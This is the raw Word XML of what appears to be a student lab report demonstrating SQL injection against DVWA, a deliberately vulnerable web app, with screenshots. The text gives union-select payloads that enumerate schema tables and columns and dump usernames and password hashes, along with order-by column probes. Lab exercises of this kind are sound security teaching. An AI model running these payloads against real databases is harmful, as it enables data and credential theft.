          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2934954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Picture 35" descr="E:\Downloads\WhatsApp Image 2021-05-15 at 11.05.5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wnloads\WhatsApp Image 2021-05-15 at 11.05.54 PM.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34954"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00486052" w:rsidRPr="00486052">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86052" w:rsidRPr="00486052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2965917"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="36" name="Picture 36" descr="E:\Downloads\WhatsApp Image 2021-05-15 at 11.08.3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WhatsApp Image 2021-05-15 at 11.08.32 PM.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65917"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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943600" cy="30353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3035300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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8862F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b) Implement a web application with back end in MySQL and demonstrate SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="29464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943600" cy="2946400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="32131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943600" cy="3213100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5110762" cy="1938167"/>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110762" cy="1938167"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4419600" cy="193357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r="25641" b="33329"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4419600" cy="1933575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4277986" cy="1979234"/>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277986" cy="1979234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4962525" cy="16383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b="32283"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4962525" cy="1638300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4829175" cy="302895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4829175" cy="3028950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7"/>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_ahxq4dtntm1r" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>Union select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> select user(),database()#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2938463" cy="956116"/>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2938463" cy="956116"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2995441" cy="1439797"/>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2995441" cy="1439797"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="400" w:after="240"/>
        <w:ind w:left="300" w:right="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> select 1,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3330419" cy="878227"/>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3330419" cy="878227"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>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943600" cy="1447800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7"/>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), 2 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='users'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4371975" cy="115252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4371975" cy="1152525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="13970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943600" cy="1397000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7"/>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="202124"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from users#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3890963" cy="1120389"/>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3890963" cy="1120389"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3027637" cy="3052763"/>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3027637" cy="3052763"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:color w:val="9AA0A6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7"/>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8862F1">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29464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943600" cy="2946400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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943600" cy="33401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rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Order by 1 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="33401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w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Order by 2 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="33401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rsidR="00AB1DA7" w:rsidRDefault="008862F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Order by 3 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent l="0" t="0" r="0" b="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p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Order by 4 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="33401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rsidR="00AB1DA7" w:rsidRDefault="008862F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Order by 5 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="33401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p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Order by 6 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="33401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8862F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Union select 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,2,3,4,5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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33401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p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
